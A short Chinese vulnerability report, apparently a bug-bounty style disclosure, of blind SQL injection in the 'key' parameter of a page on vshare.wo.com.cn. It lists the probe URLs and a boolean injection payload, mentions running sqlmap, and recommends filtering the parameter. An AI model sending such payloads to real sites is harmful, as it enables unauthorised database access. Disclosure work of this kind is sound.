存在注入站点:
http://vshare.wo.com.cn/
注入点:http://vshare.wo.com.cn/album_list?key=1
注入参数key=1
http://vshare.wo.com.cn/album_list?key=1'
返回空白页面。
http://vshare.wo.com.cn/album_list?key=1%' and 1=1 and '%'='
返回正常。
SQLMAP能跑,不手工了,上一个手工累死人了。
注了没多久,竟然超时了。。。
盲注,所以速度很慢。
到这里为止吧。能证明就好
修复方案:
过滤key